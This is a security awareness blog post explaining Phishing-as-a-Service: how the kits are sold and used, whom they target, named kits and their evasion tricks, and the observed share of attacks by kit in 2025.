Everything you need to know about Phishing-as-a-Service

What is Phishing-as-a-Service?

Phishing-as-a-Service, or PhaaS, is a cybercrime model where threat actors offer phishing tools, kits and services to other attackers, often via subscription or one-time payment. It lowers the barrier to entry for phishing attacks by providing ready-made templates, hosting, automation and even customer support. PhaaS enables non-technical users to launch sophisticated phishing campaigns, contributing to the rise in phishing incidents globally

How does PhaaS work?

1. Attackers sign up for this service — often through Darknet or Telegram channels — and obtain access to their PhaaS infrastructure.
2. The service provides ready-made fake emails and websites that look just like real companies.
3. The scammer can customize messages to make them convincing.
4. Then, these fake emails or websites are sent out to lots of people.
5. When someone falls for the trick and enters their private info, the scammer collects it and can steal money or identities.

Who uses PhaaS?

• Attackers who want to do credential theft but don’t know how to build the phishing emails, infrastructure to host fake Microsoft/Google login pages, steal multifactor-authentication (MFA) tokens and send them to a command-and-control server.
• Sometimes even people who aren’t very tech-savvy can use PhaaS because it makes it easy for anyone to launch scams.

Why do they use PhaaS?

• It saves time and effort — they don’t have to create complicated scam setups from scratch.
• It’s often cheap or subscription-based, so it’s easy to access.

·       It’s much easier now to launch a sophisticated phishing campaign targeting thousands of people with just a few clicks or minimal effort, compared to traditional phishing attacks. These modern attacks are highly advanced — they use clever methods to avoid detection and often rely on legitimate but compromised websites and platforms.

Who are the most common targets?

• Everyday people who get emails that look like they’re from their banks, platforms, favorite stores or services they use.
• Employees at companies — to try and sneak into company systems.
• Even small businesses or organizations that might not have strong security protections.

Why is PhaaS spreading?

• Access to these kits is easy to get because they are offered at affordable prices.
• They are more effective and have higher delivery rates than traditional attacks because the kits include advanced tools that obfuscate (make confusing) and encrypt (secure) the source code and use other techniques to avoid detection.
• The service hides technical complexity, so anyone can join in.
• It is hard to stop PhaaS platforms completely as:
  • They know how to stay hidden — These platforms are experts at sneaking around. They use clever tricks to avoid being spotted by security systems or law enforcement. They keep changing their websites, emails, and methods so they don’t get caught easily.
    
    
  • They’re everywhere — PhaaS platforms operate all over the world. They use servers and websites in different countries, making it tough for anyone to track them down or shut them off quickly.

New and emerging PhaaS attacks

PhaaS (Phishing-as-a-Service) is rapidly evolving and producing newer, more sophisticated kits that make attacks easier and more effective — especially for less technical cybercriminals.

For example, CoGUI is a new phishing kit specifically targeting Japanese organizations, showing how these tools are being tailored for specific regions and victims.

Other new and emerging phishing kits include:

• Sniper Dz – A highly customizable kit used to mimic login pages of popular services, making phishing attempts look very convincing.
• Morphing Meerkat – Known for its ability to quickly adapt its appearance and bypass email filters.
• Darcula – A stealthy kit that combines phishing and malware delivery, often targeting mobile users.
• SessionShark – Specializes in stealing active login sessions, letting attackers hijack accounts without even needing passwords.

What makes these kits particularly dangerous is that they constantly evolve — updating their methods to avoid being detected by security systems. This ongoing development helps scammers stay one step ahead and makes it harder to shut them down.

Innovative techniques in PhaaS attacks

Phishing attacks are getting smarter and trickier by using new methods to fool people and avoid being caught. Here are some of the clever tricks that scammers use in PhaaS attacks:

1. Using real, trusted websites
   Instead of creating fake websites from scratch, scammers often use popular, legitimate platforms to hide their harmful links or files. This makes it harder for people and security tools to spot that something is wrong.
2. Encryption to stay hidden
   They encrypt their malicious code, which means they scramble it so it looks like gibberish. This makes it tough for security software to detect and block their attacks.
3. Making code confusing (obfuscation)
   Scammers also use techniques to make their code confusing and hard to understand, so even experts have a tough time figuring out what the code really does.
4. Always changing their tricks
   These phishing kits keep evolving over time. They regularly update how they work so they can slip past security defenses that get smarter every day.
5. Using real but hacked websites
   Attackers sometimes use legitimate websites that have been compromised to host their scams. Because these sites are real and trusted, it’s easier to trick victims.
6. Avoiding detection with smart checks
   Some phishing tools can detect when security bots or sandbox environments are analyzing them. When this happens or once the attack has run its course, they redirect victims to real websites to avoid raising suspicion.

PhaaS kits compete with each other on the following terms

1. Price and accessibility: Kits that are cheaper or easier to get tend to attract more users. Some offer subscriptions, while others sell one-time licenses. The price and payment options matter a lot.
2. Updates: Some PhaaS providers offer customer support and regularly update their kits to bypass new security measures. Kits that stay updated and provide help keep their users loyal.
3. Success rates: If a kit is known for helping scammers avoid detection and successfully steal information, it gains popularity over others.

Volume of PhaaS attacks

Since the beginning of 2025, approximately 60% to 70% of the phishing attacks we’ve observed have been PhaaS attacks. Among these, the most widely used kit is Tycoon 2FA, accounting for 76% of the attacks. EvilProxy makes up about 8%, while Mamba 2FA and Sneaky 2FA together represent 6%. The remaining 10% comes from various other phishing kits such as LogoKit, CoGUI, FlowerStorm, Gabagool, and others.

Note: This blog post was co-authored by Deerendra Prasad.